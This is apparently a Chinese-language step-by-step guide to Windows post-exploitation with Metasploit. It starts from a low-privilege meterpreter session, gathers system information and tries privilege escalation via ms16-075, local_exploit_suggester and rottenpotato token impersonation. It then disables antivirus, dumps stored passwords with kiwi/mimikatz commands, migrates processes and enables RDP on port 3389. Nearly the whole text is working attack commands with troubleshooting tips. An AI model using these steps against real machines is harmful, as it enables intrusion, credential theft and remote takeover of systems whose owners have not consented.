一、信息收集
当我们的msf普通权限成功连接后,如图:
shell进入命令行模式:
存在中文乱码,<code>chcp 65001</code>将编码格式改为utf-8:
将systeminfo信息输出到文档info.txt:
exit退出当前终端。
下载systeminfo信息 download c:\\users\\root\\Desktop\\info1.txt /mnt/hgfs/share/info1.txt:
将syteminfo信息通过工具筛选可能存在的提权漏洞。
如疑似存在漏洞ms16-075。将当前会话放置 后台background,查看后台会话:
search ms16-075,搜索漏洞利用模块:
use 1,使用模块,info查看漏洞信息
options查看配置。最后run执行,发现执行出错,网上找一些好的payload上传
Getuid 查看当前权限
Getsystem 自动化提升
先进入会话 sessions -i n
上传本地恶意文件到目标机器 ,尽量不要直接上传到C盘根目录会报错。
list_tokens -u //列出当前存在的令牌
execute -cH -f C:/users/root/rottenpotato.exe 创建新进程
impersonate_token “NT AUTHORITY\\SYSTEM” //模仿windows system令牌,有时候一次不会成功,多试几次
最终提权失败。
使用模块:<code>use multi/recon/local_exploit_suggester 来识别当前系统中可用的exp</code>
检测出几个可能利用的漏洞逐一尝试。
提权成功后即为system权限。
到system权限后总思路为远程,首先使用猕猴桃将密码读出,然后打开3389端口
首先关杀软:
运行<code>load mimikatz</code>,版本msf6中,mimikatz被<code>kiwi模块</code>合并了。
查看kiwi的使用指南:<code>help kiwi</code>
三步走:列举所有凭据:<code>creds_all</code>
列举所有kerberos凭据:<code>creds_kerberos</code>
调用kiwi_cmd执行mimikatz命令:<code>kiwi_cmd sekurlsa::logonpasswords</code>
Kiwi的使用,发现执行命令没有结果或报错。
<code>ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process</code>。这是因为你上传的是X86的吗,需要迁移进程到x64的
使用命令:getuid查看当前进程号
然后ps查看所有进程,找到适合迁移的进程,且为system权限。
使用命令:migrate 7240迁移进程到其他id
最后的打开3389端口:run post/windows/manage/enable_rdp